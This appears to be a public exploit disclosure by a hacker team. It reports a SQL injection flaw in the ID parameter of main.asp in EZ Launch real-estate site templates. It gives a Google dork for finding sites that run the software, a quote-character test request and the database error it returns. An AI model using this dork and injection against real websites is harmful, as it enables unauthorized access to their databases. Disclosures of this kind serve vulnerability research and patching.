facebook facebook twitter rss

EZ Launch - SQL Injection

Author: Rednofozi , Published: 18-09-2018
# Exploit Title:  EZ Launch - SQL Injection
# Google Dork: Powered By EZ SiteLaunch LTD ext:asp
# Date: 17/09/2018
# Author: Rednofozi
# Team: https://anonysec.org
# Tested on: Windows 10 x64
# Vendor Homepage: http://www.ezsitelaunch.com/
# Software Link: http://www.realestatewebtemplates.com/
***************************************************

[+] Vulnerable File: main.asp

[+] Parameter: ID


======

[+] Test:

======

[+] localhost/main.asp?id=1'


========

[+] Returns:

========

[+] Microsoft Access Database Engine error '80040e14'

[+] Syntax error (missing operator) in query expression 'mainID = 1'''.

[+] /main.asp, line 27
***************************************************
iran anonysec hackers
***************************************************
Discovered by : Rednofozi
Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :